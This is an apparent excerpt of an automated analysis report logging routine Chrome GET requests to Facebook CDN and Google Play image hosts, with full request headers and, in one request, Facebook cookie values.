    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3imlR4/y0/l/en_GB/JAH0JDr9qF3.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tWCdgpyyKxpkE24hVTjbnXYwTjEmt_dTTn9v4WK08-ku0TAqYxR8D91sNZCx4RQCuyxj=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /L4G1Qonz3vmIv5d5fD6sF7P5_hHrjbPSMdNGcV7PuYhT7KGKmPp3es6EI0XpQaa7WIA=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1YVfPMu-xnQmXy6NDTtqeQiXL2jYZZc79TZbrenrA6XsdhCcyT53UlJQltFNFXXH0G0=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y9/r/RedpCkzOAc2.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i5IJ4/yI/l/en_GB/erWoO4SeR1N.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ixu44/yU/l/en_GB/Iud4PfRtk1i.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iO_y4/y8/l/en_GB/81PfJWE3AVG.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iKG04/yD/l/en_GB/-StUlb9du6-.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ye/r/GcgopRl4mBW.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yE/r/1rYlRSL7ILQ.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iCwx4/yZ/l/en_GB/HZi4Ht9U6gq.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iMX84/yc/l/en_GB/JXFTcdEOgst.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yL/r/2KW45SaLwT9.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fkZeS0WFB9F7eek_vtduoMGNd8Ok5LnjRAGCvmrdxk7U4_6SuAyxMo86c71zL7WzoC0=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /8AutM_5u57TFCrU4VHQjobEaJBTsPGhI8Sw6KhP0uCiE3ipk0VgfcBEqB9UcciLtCg=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/P-sBcB8ct1C.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rzg9wFcos31ri58r-zeMo-2JMQGhoIxiBXY8vmhtoagdE-JG78l5CUSsQ9GNuqwATQE=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /DEbRrpMmIVFTXH_FH2MezPtEBXhYs2UdwMRK7Q8Mkqdg0tfCikZRnvtZscfYkdbwTvY=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /J9k_4JjLDkXrp_571RkxZLMjle3uV-KAmLxET5B8zcS5XXgeWLNIBS6y2khRQrpVN6Z3=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /-2j2BAdv613PP-EaFA-H9Oczwgljn4rRgotfLmIYMLIMRp3p_bG7gQIfBCXk1m_wiRQ=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /Bu3S5bBEAvad3fOA-pOpNRIOOM970zCAK8IG1anxUgfrRRbvNWICtFr19O_BHZIjlo8=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wENQzf4cxxI_LJZ-rHMq-ZERLLQwqY2E8FjSPOToA9rL_NvYoBT7KJf94cZB7TooZvk=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /LW7xh2wtB12g50iQvEER_zZTcY4OLuT4PV-RhN2ums0B65opMFwcHdELAmXECB2CrGpM=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /security/hsts-pixel.gif HTTP/1.1Host: facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y9/r/RedpCkzOAc2.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ye/r/GcgopRl4mBW.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ixu44/yU/l/en_GB/Iud4PfRtk1i.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yH/r/xgVgalBG80z.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v3/yN/l/0,cross/S60_mKfvulW.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i5IJ4/yI/l/en_GB/erWoO4SeR1N.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iKG04/yD/l/en_GB/-StUlb9du6-.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_T2WgYqgPLhE4WBKsH85VwWFzN8tCiVwGRnEvq92u_sjcphUK7vpXETasL_reqU-YA=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ApR4SacgWT7KSe5v_eEOrBvuKwQmeGpkOjfcC1WNINE8bJI7iBgaW00eohkBmJ73QW8=w648-h364-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /lqq4t8D0lUEFIPQGIn9fZIxyulux127eqqYMK1aX58Xn9Kfd6xfXVCSRW72RMorVeyw=w648-h364-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /y1SAU1g399-DZL0-G3-i0CoT2pQQABM5miEa1C3w2--MxFNh26USlCRt1WGTsmvA6H2v=w2560-h1440-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /V9eV8_8k5ssFM3cD8eA0oIYP-1mOekwcCFsH5cEWoOLvJ8EmUJYFRkdwg1d-lc1s9Q=w2560-h1440-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
